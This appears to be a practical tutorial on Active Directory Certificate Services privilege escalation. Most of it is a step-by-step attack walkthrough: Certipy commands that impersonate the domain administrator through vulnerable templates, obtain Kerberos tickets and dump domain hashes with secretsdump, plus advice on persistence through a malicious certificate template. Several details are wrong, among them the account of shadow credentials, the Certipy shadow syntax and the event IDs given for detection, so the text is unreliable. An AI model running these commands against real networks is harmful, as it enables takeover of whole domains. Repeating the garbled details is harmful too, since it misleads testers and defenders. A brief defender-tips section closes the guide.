Mastering Active Directory Certificate Services Privilege Escalation: A Practical Guide

Introduction

Active Directory Certificate Services (AD CS) is a powerful component in many enterprise networks, but misconfigurations can lead to devastating privilege escalation attacks. This guide walks you through the most common exploitation techniques—template misconfigurations and shadow credential misuse—using tools like Certipy and PKINITtools. Whether you're a penetration tester or a defender, understanding these methods is critical. By the end, you'll be able to identify vulnerable templates, request rogue certificates, and abuse credentials to gain domain admin access.

Mastering Active Directory Certificate Services Privilege Escalation: A Practical Guide — Source: unit42.paloaltonetworks.com

What You Need

Domain-joined machine with network access to a Domain Controller
Low-privileged domain credentials (e.g., a standard user account)
Tools installed: Certipy (Python), PKINITtools, Impacket, and optionally Certify for manual checks
Target environment: Active Directory with AD CS role deployed (Windows Server)
Permissions: Ability to enumerate domain objects (default for authenticated users)

Step 1: Enumerate AD CS Templates for Misconfigurations

Start by discovering certificate templates that are configured with dangerous settings. Use Certipy to query the Certification Authority (CA):

certipy find -u user@domain.local -p 'password' -dc-ip 10.0.0.1

This command outputs a list of templates with their security descriptors. Focus on templates where:

Client Authentication or Smart Card Logon is allowed (EKU)
Enrollment rights are granted to low-privileged users or groups
Manager approval is disabled
Authorized Signatures requirement is set to 0

These correspond to ESC1 (vulnerable template with low rights, allows domain escalation) and ESC2 (similar but with other EKU). Also look for ESC3 (enrollment agent misconfigurations) and ESC8 (NTLM relay via HTTP).

Tip: Use the -vulnerable flag in Certipy to automatically highlight risky templates.

Step 2: Exploit Template Misconfigurations to Request a Certificate

Once a vulnerable template is identified, request a certificate that will allow authentication as another user (e.g., a domain admin). Use Certipy's req command:

certipy req -u user@domain.local -p 'password' -ca CA-SERVER -template 'VulnerableTemplate' -target-ip 10.0.0.10 -upn administrator@domain.local

Key parameters:

-upn: The User Principal Name of the account you want to impersonate (e.g., administrator)
-template: The name of the vulnerable template (e.g., 'VulnerableTemplate')
-ca: The CA server hostname

If successful, you'll receive a PFX file containing the certificate and private key. This certificate is signed by the CA and will be accepted by Kerberos as proof of the target user's identity.

Step 3: Abuse Certificate Authentication for Kerberos Tickets

With the stolen certificate, you can request Kerberos TGT (Ticket Granting Ticket) from the Domain Controller using PKINIT. Tools like gettgtpkinit.py from PKINITtools or Certipy's auth command:

certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1

This will output a Kerberos TGT in CCACHE format. Alternatively:

python3 gettgtpkinit.py -cert-pfx administrator.pfx domain.local/administrator administrator.ccache

Now you have a usable TGT. Set the KRB5CCNAME environment variable and authenticate:

export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass domain.local/administrator@dc01.domain.local

You can now dump domain hashes, access other machines, and escalate privileges.

Step 4: Leverage Shadow Credentials via PKCS12 Manipulation

Shadow credentials refer to the abuse of certificate-based authentication to obtain password hashes without needing the actual password. This technique often involves manipulating PFX files or using the shadowcred module in Certipy.

First, identify machines where you have write access (e.g., via MachineAccountQuota). Use Certipy to add a shadow credential to a target computer account:

certipy shadow -u user@domain.local -p 'password' -target 'TARGETCOMPUTER$' -ca CA-SERVER

This command creates a new certificate for the target machine and retrieves its NTLM hash. You can then use this hash to authenticate as the machine account (often a high-privilege account). For example:

certipy shadow -u user@domain.local -p 'password' -target 'DC01$' -ca CA-SERVER -dc-ip 10.0.0.1

Note: Shadow credentials are especially dangerous because they don't require elevated permissions—just enrollment rights on the CA.

Step 5: Post-Exploitation and Persistence

With domain admin access, you can:

Dump the entire domain database using secretsdump.py
Create backdoor certificates that remain valid even if the original accounts change passwords
Modify certificate templates to allow future abuse

For persistence, consider adding a malicious certificate template that allows any user to enroll as any other user. This ensures you can regain access anytime.

Tips for Defenders and Testers

Monitor for abnormal certificate requests: Look for requests from low-privileged users with high-value UPNs (e.g., administrator).
Restrict enrollment permissions: Remove unnecessary groups from certificate template security settings.
Enable issuance policies: Require manager approval or authorized signatures for sensitive templates.
Audit CA logs: Check Event ID 4886 (certificate request submitted) and 4887 (certificate issued) for anomalies.
Use strong certificate maps: Ensure SAN (Subject Alternative Name) mapping is properly configured to prevent impersonation.
Regularly scan with Certipy: Run certipy find -vulnerable periodically to identify misconfigurations before attackers do.
Shadow credential detection: Monitor for Event ID 4694 (Kerberos PKINIT pre-authentication) from unusual computers or users.

This guide covers the two most prevalent AD CS escalation paths. By practicing these steps in a lab environment, you'll gain a deep understanding of how attackers move and how to stop them.